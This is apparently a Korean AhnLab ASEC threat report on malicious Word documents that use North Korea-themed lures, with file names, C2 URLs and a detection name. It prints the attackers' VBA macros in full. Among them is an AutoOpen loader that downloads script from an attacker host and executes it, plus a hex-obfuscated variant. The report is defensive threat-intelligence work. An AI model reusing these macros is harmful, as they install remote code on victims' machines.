대북 관련 본문 내용 악성 워드의 지속 유포 정황 확인

ASEC 분석팀은 대북관련 내용을 포함한 악성 워드 문서가 지속적으로 유포되고 있음을 확인하였다. 확인된 워드 파일에 포함된 매크로 코드는 이전에 게시된 < ‘수출용 골드바 매매 계약서’로 위장한 악성 워드문서> 에서 확인되었던 것과 유사하다.

최근 확인된 파일명은 아래와 같다.

• 중국의 군사전략 분석 및 미래 군사전략 전망.doc (10/25 확인)
• 질의서-12월 방송.doc (10/28 확인)
• 질의서-7월 방송.docm (10/1 확인)
• KF 대양주 차세대 정책전문가 네트워크_발제안내 (2).doc (10/7 확인)
• 210813_업무연락(사이버안전).doc (8월 확인)

확인된 파일 중 다수의 워드 문서에서 파일명 또는 본문에 대북 관련 내용을 담고 있는 것이 특징이다.

[중국의 군사전략 분석 및 미래 군사전략 전망.doc]

‘중국의 군사전략 분석 및 미래 군사전략 전망.doc’에 포함된 매크로에는 아래와 같이 문서보호 해제와 관련된 코드가 존재한다. 설정된 비밀번호는 1qaz2wsx로 <대북관련 본문 내용의 External 링크를 이용한 악성 워드 문서>에 설명한 문서와 동일한 암호를 사용하여 해당 파일 역시 동일한 공격자가 제작한 것으로 추정된다.  

Sub Present()
    On Error Resume Next
    Weed "pic", "1qaz2wsx"
    For Mode = 10 To 0 Step -1
        ActiveWindow.View.SeekView = Mode
        With Selection
            .WholeStory
            .Font.Hidden = False
            .Collapse
        End With
    Next
End Sub

사용자가 워드 파일 실행 후 매크로 허용 시 AutoOpen()을 통해 악성 매크로가 자동으로 실행된다. 악성 매크로는 위의 문서 보호 해제코드 실행 후 hxxp://sarvice.medianewsonline[.]com/file/uplload/list.php?query=1 에서 추가 데이터를 받아와 1589989024.xml에 저장한다. 악성 행위를 수행하는 매크로 코드는 아래와 같다.

Sub AutoOpen()
    On Error Resume Next
    Present
    wnd.Save
    cnt = "On Error Resume Next:Set mx = CreateObject(""Microsoft.XMLHTTP""):mx.open ""GET"", ""http://sarvice.medianewsonline.com/file/uplload/list.php?query=1"", False:mx.Send:Execute(mx.responseText)"
    pth = GenPlace() & "\1589989024.xml"
    ResContent pth, cnt
    Perform ("wscript.exe //e:vbscript //b " & pth)
End Sub

[질의서-12월 방송.doc]

‘질의서-12월 방송.doc’의 경우 앞서 설명한 워드 파일의 매크로 코드보다 조금 더 난독화가 되어 있다.

Sub ytoqdggdrsetyaeorw(bret)
fn = FreeFile
ui = isqgsilwwutr("677265656e6761726465") & isqgsilwwutr("6e2e6b6b6b32342e6b722f6d6f62696c652f736b696e2f626f6172642f67616c6c6572792f6572726f722f757064617465")
rp = Environ(isqgsilwwutr("617070") & isqgsilwwutr("64617461")) & isqgsilwwutr("5c4d6963726f736f66745c4f66666963655c76657273696f6e2e") & isqgsilwwutr("786d6c")
Open rp For Output As #fn
hs = isqgsilwwutr("4f6e") & isqgsilwwutr("204572726f7220526573756d65204e6578743a536574206f7073743d4372656174654f626a65637428")
mids = isqgsilwwutr("4d53584d4c322e536572766572584d4c") & isqgsilwwutr("485454502e362e30")
hs = hs & """" & mids & """"
mids = isqgsilwwutr("293a6f7073742e6f70") & isqgsilwwutr("656e20")
hs = hs & mids & """"
mids = isqgsilwwutr("474554")
hs = hs & mids & """," & """"
mids = isqgsilwwutr("687474703a2f2f78") & isqgsilwwutr("78782f6c6973742e7068703f71756572793d31")
mids = Replace(mids, isqgsilwwutr("787878"), ui)
<생략>

해당 매크로 역시 ‘중국의 군사전략 분석 및 미래 군사전략 전망.doc’와 동일한 악성 행위를 수행하며 접속하는 URL은 다음과 같다.

• hxxp://greengarden.kkk24.kr/mobile/skin/board/gallery/error/update/list.php?query=1

또한, ‘질의서-12월 방송.doc’의 워드 파일은 수집되지 않았지만 이와 유사한 파일명을 지닌 ‘질의서-7월 방송.docm’ 파일은 아래와 같이 대북 관련 내용이 존재한다.

[질의서-7월 방송.docm]

그림1. 질의서-7월 방송.docm의 본문

접속 URL : hxxp://sendlucky.scienceontheweb.net/ben/chads/list.php?query=1

아래는 유사 매크로 파일에서 확인한 추가 C2 주소이다.

• hxxp://smgfishing.co[.]kr/theme/basic/mobile/skin/new/basic/list.php?query=1
• hxxp://tinytalk.mygamesonline[.]org/web/fell/list.php?query=1
• hxxp://sendlucky.scienceontheweb[.]net/ben/chads/list.php?query=1
• hxxp://bipaf[.]org/bbs/zipcode/style/css/list.php?query=1

이처럼 악성 매크로를 포함한 대북 관련 워드 문서는 다양한 파일명과 내용들로 꾸준히 유포되고 있다. 해당 유형의 파일들의 경우 매크로 사용 시 실제 관련 내용을 포함하고 있어 사용자가 악성 파일 임을 인지하기 어렵기 때문에 각별한 주의가 필요하다.

현재 V3에서는 해당 악성코드를 다음과 같이 진단하고 있다.

[파일진단]

Downloader/DOC.Generic.S1649

AhnLab TIP를 구독하시면 연관 IOC 및 상세 분석 정보를 추가적으로 확인하실 수 있습니다. 자세한 내용은 아래 배너를 클릭하여 확인해보세요.